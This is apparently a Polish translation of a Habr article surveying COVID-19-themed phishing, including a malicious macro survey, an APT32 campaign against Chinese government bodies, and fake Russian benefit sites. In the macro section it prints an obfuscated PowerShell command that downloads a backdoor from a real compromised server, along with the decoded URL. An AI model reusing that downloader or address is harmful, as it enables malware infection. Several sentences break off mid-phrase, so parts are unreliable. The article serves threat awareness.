Atakujący w dalszym ciągu wykorzystują temat COVID-19, tworząc coraz więcej zagrożeń dla użytkowników żywo zainteresowanych wszystkim, co jest związane z epidemią. W
Pamiętaj w
Chcesz bezpłatnie wykonać test na Covid-19?
Innym znaczącym przykładem phishingu związanego z koronawirusem był
Przekonanie większości użytkowników do włączenia makr również było łatwe. W tym celu zastosowano standardowy trik: aby wypełnić ankietę, należy najpierw włączyć makra, co oznacza konieczność uruchomienia skryptu VBA.
Jak widać, skrypt VBA jest specjalnie maskowany przed programami antywirusowymi.
System Windows posiada funkcję oczekiwania, dzięki której aplikacja czeka /T <sekund> przed przyjęciem domyślnej odpowiedzi „Tak”. W naszym przypadku skrypt czekał 65 sekund przed usunięciem plików tymczasowych:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Podczas oczekiwania pobrano złośliwe oprogramowanie. W tym celu został uruchomiony specjalny skrypt PowerShell:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Po zdekodowaniu wartości Base64 skrypt PowerShell pobiera z Niemiec backdoora zlokalizowanego na wcześniej zhakowanym serwerze WWW:
http://automatischer-staubsauger.com/feature/777777.png
i zapisuje go pod nazwą:
C:UsersPublictmpdirfile1.exe
Folder ‘C:UsersPublictmpdir’
jest usuwany po uruchomieniu pliku „tmps1.bat” zawierającego polecenie cmd /c mkdir ""C:UsersPublictmpdir"".
Ukierunkowany atak na agencje rządowe
Ponadto analitycy FireEye zgłosili niedawno ukierunkowany atak APT32 wymierzony w struktury rządowe w Wuhan, a także chińskie Ministerstwo Zarządzania Kryzysowego. Jeden z rozesłanych plików RTF zawierał link do artykułu w New York Times pt
Co ciekawe, według Virustotal w momencie wykrycia żaden z programów antywirusowych nie wykrył tego przypadku.
Kiedy oficjalne strony internetowe nie działają
Najbardziej uderzający przykład ataku phishingowego miał miejsce niedawno w Rosji. Powodem tego było powołanie długo oczekiwanego świadczenia na dzieci w wieku od 3 do 16 lat. Kiedy 12 maja 2020 roku ogłoszono rozpoczęcie przyjmowania wniosków, miliony ludzi pobiegły na stronę Służb Państwowych po długo oczekiwaną pomoc i zniszczyły portal nie gorzej niż profesjonalny atak DDoS. Kiedy prezydent stwierdził, że „Służby rządowe nie radzą sobie z napływem wniosków”, w Internecie zaczęto mówić o uruchomieniu alternatywnej strony przyjmowania wniosków.
Problem w tym, że kilka stron zaczęło działać jednocześnie i o ile jedna, ta prawdziwa pod adresem posobie16.gosuslugi.ru, faktycznie przyjmuje zgłoszenia, o tyle więcej
Współpracownicy z SearchInform odkryli około 30 nowych fałszywych domen w strefie .ru. Od początku kwietnia firmy Infosecurity i Softline wyśledziły ponad 70 podobnych fałszywych witryn usług rządowych. Ich twórcy manipulują znanymi symbolami, a także używają kombinacji słów gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie i tak dalej.
Hype i inżynieria społeczna
Wszystkie te przykłady tylko potwierdzają, że napastnicy skutecznie zarabiają na temacie koronaawirusa. A im większe napięcie społeczne i im bardziej niejasne kwestie, tym większe ryzyko, że oszuści ukradną ważne dane, zmuszą ludzi do samodzielnego oddania pieniędzy lub po prostu włamią się do większej liczby komputerów.
A biorąc pod uwagę, że pandemia zmusiła potencjalnie nieprzygotowanych ludzi do masowej pracy z domu, zagrożone są nie tylko dane osobiste, ale także firmowe. Na przykład niedawno użytkownicy Microsoft 365 (dawniej Office 365) również padli ofiarą ataku phishingowego. Ludzie otrzymywali masowe „nieodebrane” wiadomości głosowe jako załączniki do listów. Jednak w rzeczywistości pliki były stroną HTML, na którą odsyłane były ofiary ataku
Źródło: www.habr.com